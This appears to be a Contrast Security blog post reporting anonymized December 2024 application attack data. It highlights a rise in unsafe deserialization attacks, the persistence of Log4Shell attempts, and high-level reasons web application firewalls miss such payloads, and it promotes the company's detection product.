Silent but deadly: December sees deserialization attacks surge despite overall lull in app attacks

Attacks on individual applications were down month to month in December 2024, but one of the most dangerous types of attacks was up significantly. That’s according to data Contrast Security publishes monthly about the detection and response of real-world application and application programming interface (API) attacks with Application Detection and Response (ADR). What you’re about to see is data that we gather from the attacks on our apps and those of our customers, anonymized and averaged. 

Last month, we saw each individual application or API get attacked an average of 45 times, down slightly from the month before. Those are real attacks, not the types of false positives that drive security teams crazy. Of those attacks, we saw a jump in unsafe deserialization, used to attack each application and API an average of 22 times. 

Context

We’ll get to more of the attack data in a moment. We want to start with some context to explain how we use the word “attack.” We are talking only about attacks that are confirmed to reach their intended vulnerability and are about to launch the exploit, not “the noise of the internet” type attacks that would never have turned into a noteworthy breach. Contrast tunes out the noise, filtering out the false positives. 

Contrast’s attack data is measured directly from real-world running applications and APIs. Our attacks aren’t measured in millions, billions or even trillions, because that’s part of the problem: too much noise. Because Contrast Security instruments the code, we’re not reporting on signatures or theoretical attacks, only what’s actually a dangerous anomaly.

To better explain, take a look at this graphic, which accounts for one month of data per application. For each application, organizations see hundreds of millions of calls to potentially dangerous functions. From these calls, "security relevant observations" are isolated for closer examination.  For some organizations, that’s where alert fatigue begins. Then, there are thousands of non-viable attacks that get past a web application firewall (WAF), also leading to false positives. But, what Contrast identifies are the actual viable attacks that reach a vulnerability. On average, the security operations center (SOC) should be worried about and focus on just a few a month, treating them as incidents.  

When we look at what Contrast saw in December 2024, there were 480 million calls to potentially dangerous functions per application. When you look at the attacks Contrast ADR identified, you can see an average of 45 reached each individual application or API and just about 3 of those, on average, became incidents that needed to be investigated. What this graph shows is the importance of knowing exactly what to investigate to avoid alert fatigue. 

The next image breaks down the types of viable attacks that Contrast ADR identified and stopped.

Three takeaways this month: 

1. Attacks are down slightly month to month. While we usually see attacks go up across the cyber ecosystem during the holidays, the number of applications reporting attacks likely went down because ADR identifies a lot of security testing, which happens less during the last two weeks of December. 
2. Unsafe Deserialization is UP. Month to month, there was a sharp rise in these types of attacks, which can be incredibly impactful. WAFs struggle with unsafe deserialization for a number of reasons: 
   1. Complex payloads: Unsafe deserialization attacks can involve serialized objects that are difficult for WAFs to parse and inspect effectively.
   2. Application-specific: These attacks exploit language, framework and app/API specific deserialization mechanisms, which are not universally recognizable by a WAF's generic rule set.
   3. Encrypted or Encoded Data: Serialized payloads might be encoded or encrypted, bypassing WAF inspection entirely.
   4. Evasion Tactics: Attackers can obfuscate malicious payloads to avoid detection by WAF signatures.
3. Log4Shell attacks are still causing problems. December was the third anniversary of the discovery of the Log4j vulnerability. It is striking that even now we see attacks every month on vulnerable code. WAFs can stop some of them, but attackers can evade signature-based detection without much effort. Contrast ADR stops these attacks.

Analysts: Why the Log4Shell Grinch is still hanging around

We’ll see what next month brings and whether the jump in unsafe deserialization continues. 

Contact Contrast Security if you’d like to see what’s really happening in your application layer. 

Read more:

• Contrast blog: 12 things to know about ADR
• Contrast blog: Smarter AppSec: How ADR, secure by design and 'shift smart' are redefining cybersecurity
• Contrast blog: If only I’d known ADR was possible when I was a SOC analyst!